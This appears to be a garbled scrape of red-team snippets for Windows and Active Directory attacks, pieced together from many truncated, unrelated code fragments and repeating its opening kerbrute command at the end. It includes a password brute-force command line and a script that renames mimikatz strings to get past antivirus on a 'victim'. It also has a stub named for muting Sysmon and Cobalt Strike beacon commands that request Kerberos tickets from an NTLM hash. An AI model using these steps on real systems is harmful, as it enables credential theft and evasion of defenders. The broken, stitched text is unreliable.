With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus version that includes the brute module:
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/windows | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
| // A demonstration example for http://stackoverflow.com/a/26124494 | |
| // It runs a goroutine locked to an OS thread on Windows | |
| // then impersonates that thread as another user using its name | |
| // and plaintext password, then reverts to the default security | |
| // context before detaching from its OS thread. | |
| package main | |
| import ( | |
| "log" | |
| "runtime" |
| package main | |
| //#include "dllmain.h" | |
| import "C" |
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Text; | |
| namespace MuteSysmon | |
| { | |
| class Program |
| package main | |
| import ( | |
| "bytes" | |
| "fmt" | |
| "os/exec" | |
| "strings" | |
| ) | |
| // PowerShell struct |
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus version that includes the brute module: